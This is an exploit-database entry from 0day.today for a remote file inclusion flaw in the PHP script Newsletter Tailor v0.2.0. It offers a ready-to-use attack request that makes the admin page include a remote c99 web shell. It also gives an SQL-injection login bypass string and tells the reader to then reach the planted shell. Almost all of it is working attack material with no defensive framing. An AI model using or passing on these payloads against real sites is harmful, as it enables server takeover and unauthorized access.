[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Newsletter Tailor v0.2.0 RFI Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10815
Category
web applications
Date add
09-02-2010
Platform
unsorted
==========================================
Newsletter Tailor v0.2.0 RFI Vulnerability
==========================================

==============================================================================
[»] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
  
[»] Script:   [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
  
###########################################################################
 ===[ Exploit ]=== include($p.".php");
  
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <-
###########################################################################



#  0day.today [2024-11-16]  #